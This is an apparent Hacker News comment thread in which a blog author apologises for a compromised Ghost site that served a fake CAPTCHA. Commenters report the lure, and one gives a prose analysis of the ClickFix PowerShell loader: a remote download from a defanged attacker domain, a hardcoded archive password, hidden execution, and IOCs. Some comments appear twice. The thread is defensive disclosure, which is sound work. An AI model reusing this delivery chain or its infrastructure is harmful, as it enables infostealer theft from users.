OP/author here! Apologies about the malware and captcha. It looks like my site was exploited by CVE-2026-26980 affecting all Ghost sites pre v6.19 [1][2] An API key was hijacked to inject malicious JS into every page that looks like a cloudflare captcha; it seems that the JS only targeted windows users, so I didn't catch it before I shared the post widely.
The site has been upgraded to 6.44 to close the vulnerability, I rotated every API key and account credential, and both manually and programmatically scrubbed every instance I could find of the code injection across the database. I think we're clear now!
Sorry to anyone caught by this and thank you to folks for flagging it (and thanks to the HN team for letting me follow up on this after comments were closed). I'm seriously mortified. X_X
The post is fantastically helpful for keeping perspective and navigating orgs regardless of whether or not they’re a “bad company”. Because there’s parts of every company that are dysfunctional.
I am highly disrespected by your misleading and scummy CAPTcha, which is very very unethical. Copying a command to my clipboard and asking me to run it in terminal? You should be banned for this. Here is the analysis of what you were asking readers to do:
It's a multi-stage malware loader. The decoded PowerShell does this:
Forces TLS 1.2 and creates a randomly-named folder in %TEMP%.
Downloads a copy of 7z.exe (the legitimate 7-Zip binary) from httXXXps://mstclaudens.beer/api/7z.exe — it brings its own archiver so it doesn't depend on one being installed.
Downloads a password-protected archive from httpXXXs://mstclaudens.beer/api/index.php?a=dl&dg=EP7IutuFPF8R1&... — the URL carries a campaign/victim tracking ID and a hash, so the operator knows which lure you came from. It retries up to 3 times.
Extracts the archive using 7-Zip with the hardcoded password rEEiT. The password is the whole point — it lets the payload sail past most network/email AV scanning, because scanners can't peek inside an encrypted zip.
Hunts the extracted contents for an .exe or .msi and runs it with a hidden window (-WindowStyle Hidden).
Deletes the downloaded files to clean up its tracks, and re-launches the whole thing in a hidden PowerShell process.
The actual malicious payload isn't in the script — it lives in that remote archive, which I can't and won't fetch. But the delivery pattern (fake CAPTCHA → "paste in terminal" → loader → encrypted second stage → silent execution) is the textbook ClickFix chain, and the end payload in these campaigns is almost always an infostealer (Lumma, StealC, Vidar, and friends) — something that grabs browser passwords, cookies, session tokens, and crypto wallets and ships them off. The Start-Process … -WindowStyle Hidden and self-cleanup are there so you'd never see it happen.
IOCs worth recording / blocking:
Domain: mstclaudens.beer (note the cute "claudens" — these .beer / random-word TLDs are common for throwaway C2)
URLs: hxxps://mstclaudens[.]beer/api/7z.exe and hxxps://mstclaudens[.]beer/api/index.php?a=dl&...
Archive password: rEEiT
Behavior: PowerShell spawning a child PowerShell with -NoProfile -WindowStyle Hidden -Command, writing random .exe/.zip names to %TEMP%
OP/author here! Apologies about the malware and captcha. It looks like my site was exploited by CVE-2026-26980 affecting all Ghost sites pre v6.19 [1][2] An API key was hijacked to inject malicious JS into every page that looks like a cloudflare captcha; it seems that the JS only targeted windows users, so I didn't catch it before I shared the post widely.
The site has been upgraded to 6.44 to close the vulnerability, I rotated every API key and account credential, and both manually and programmatically scrubbed every instance I could find of the code injection across the database. I think we're clear now!
Sorry to anyone caught by this and thank you to folks for flagging it (and thanks to the HN team for letting me follow up on this after comments were closed). I'm seriously mortified. X_X
[1] https://github.com/TryGhost/Ghost/security/advisories/GHSA-w... [2] https://www.securityweek.com/ghost-cms-vulnerability-exploit...
Thanks for fixing the site, OP.
The post is fantastically helpful for keeping perspective and navigating orgs regardless of whether or not they’re a “bad company”. Because there’s parts of every company that are dysfunctional.
I visited on mobile and didn’t get the captcha other folks are talking about, just a useful article. Interesting.
Same here. I didn't get a captcha. Good article. And looks like human-written. Refreshing.
yes besides the malware it was a refreshing read
Why is the captcha on this site asking me to copy paste some giant command to my Terminal and hit enter?
How is actual malware still up on HN after 45 minutes?
Interesting scam, hadn't seen a re-captcha like that before, you'd have to be pretty technically illiterate to follow the instructions
[flagged]
I am highly disrespected by your misleading and scummy CAPTcha, which is very very unethical. Copying a command to my clipboard and asking me to run it in terminal? You should be banned for this. Here is the analysis of what you were asking readers to do:
It's a multi-stage malware loader. The decoded PowerShell does this:
Forces TLS 1.2 and creates a randomly-named folder in %TEMP%. Downloads a copy of 7z.exe (the legitimate 7-Zip binary) from httXXXps://mstclaudens.beer/api/7z.exe — it brings its own archiver so it doesn't depend on one being installed. Downloads a password-protected archive from httpXXXs://mstclaudens.beer/api/index.php?a=dl&dg=EP7IutuFPF8R1&... — the URL carries a campaign/victim tracking ID and a hash, so the operator knows which lure you came from. It retries up to 3 times. Extracts the archive using 7-Zip with the hardcoded password rEEiT. The password is the whole point — it lets the payload sail past most network/email AV scanning, because scanners can't peek inside an encrypted zip. Hunts the extracted contents for an .exe or .msi and runs it with a hidden window (-WindowStyle Hidden). Deletes the downloaded files to clean up its tracks, and re-launches the whole thing in a hidden PowerShell process.
The actual malicious payload isn't in the script — it lives in that remote archive, which I can't and won't fetch. But the delivery pattern (fake CAPTCHA → "paste in terminal" → loader → encrypted second stage → silent execution) is the textbook ClickFix chain, and the end payload in these campaigns is almost always an infostealer (Lumma, StealC, Vidar, and friends) — something that grabs browser passwords, cookies, session tokens, and crypto wallets and ships them off. The Start-Process … -WindowStyle Hidden and self-cleanup are there so you'd never see it happen. IOCs worth recording / blocking:
Domain: mstclaudens.beer (note the cute "claudens" — these .beer / random-word TLDs are common for throwaway C2) URLs: hxxps://mstclaudens[.]beer/api/7z.exe and hxxps://mstclaudens[.]beer/api/index.php?a=dl&... Archive password: rEEiT Behavior: PowerShell spawning a child PowerShell with -NoProfile -WindowStyle Hidden -Command, writing random .exe/.zip names to %TEMP%